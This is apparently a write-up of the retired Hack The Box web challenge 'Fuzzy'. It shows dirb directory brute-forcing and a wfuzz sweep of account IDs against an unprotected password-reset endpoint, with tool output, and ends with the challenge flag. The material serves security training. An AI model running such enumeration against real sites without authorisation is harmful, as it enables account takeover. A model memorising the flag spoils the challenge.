2 minutes
Fuzzy
Note to fellow-HTBers: Only write-ups of retired HTB machines or challenges are allowed.
Challenge info ¶
Fuzzy [by Arrexel]
We have gained access to some infrastructure which we believe is connected to the internal network of our target. We need you to help obtain the administrator password for the website they are currently developing.
The challenge ¶

Let’s use dirb to bruteforce some paths and let’s see if we find anything interesting:
$ dirb http://docker.hackthebox.eu:36338/ /usr/share/wordlists/fuzz-Bo0oM.txt -t -l
---- Scanning URL: http://docker.hackthebox.eu:36338/ ----
+ http://docker.hackthebox.eu:36338/%2e%2e//google.com (CODE:400|SIZE:166)
==> DIRECTORY: http://docker.hackthebox.eu:36338/api/
+ http://docker.hackthebox.eu:36338/api/ (CODE:200|SIZE:39)
+ http://docker.hackthebox.eu:36338/index.html (CODE:200|SIZE:4023)
+ http://docker.hackthebox.eu:36338/js/ (CODE:403|SIZE:564)
---- Entering directory: http://docker.hackthebox.eu:36338/api/ ----
+ http://docker.hackthebox.eu:36338/api/index.html (CODE:200|SIZE:39)
The api folder definitely looks interesting, let’s dig deeper. Files will most probably have the .php
extension, so pass that to the -X
parameter.
$ dirb http://docker.hackthebox.eu:36338/api/ /usr/share/wordlists/wfuzz/general/big.txt -X .php -t -l
---- Scanning URL: http://docker.hackthebox.eu:36338/api/ ----
+ http://docker.hackthebox.eu:36338/api/action.php (CODE:200|SIZE:24)
Since we’re probably looking for a credential or some user-related, I did some manual guessing on the action parameter(s). After testing login
and register
, I noticed reset
returns a different response. Also note that the homepage (see screenshot above) made mention of the login/password reset function.

Now we need to find out what we want to reset.
We’re probably looking for a user id, so let’s try some numbers. Entering a few guesses results in “Account ID not found”.
Let’s fuzz some numbers, automation FTW!
$ wfuzz -z range,0-1000 --hs="Account ID not found" http://docker.hackthebox.eu:36338/api/action.php?reset=FUZZ
********************************************************
* Wfuzz 2.4 - The Web Fuzzer *
********************************************************
Target: http://docker.hackthebox.eu:36338/api/action.php?reset=FUZZ
Total requests: 1001
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000021: 200 0 L 10 W 74 Ch "20"
Total time: 4.455422
Processed Requests: 1001
Filtered Requests: 1000
Requests/sec.: 224.6700
The flag ¶
ID 20 apparently doesn’t return above-mentioned error message. Opening this in a browser, we get our flag 🙂
You successfully reset your password! Please use HTB{h0t_fuzz3r} to login.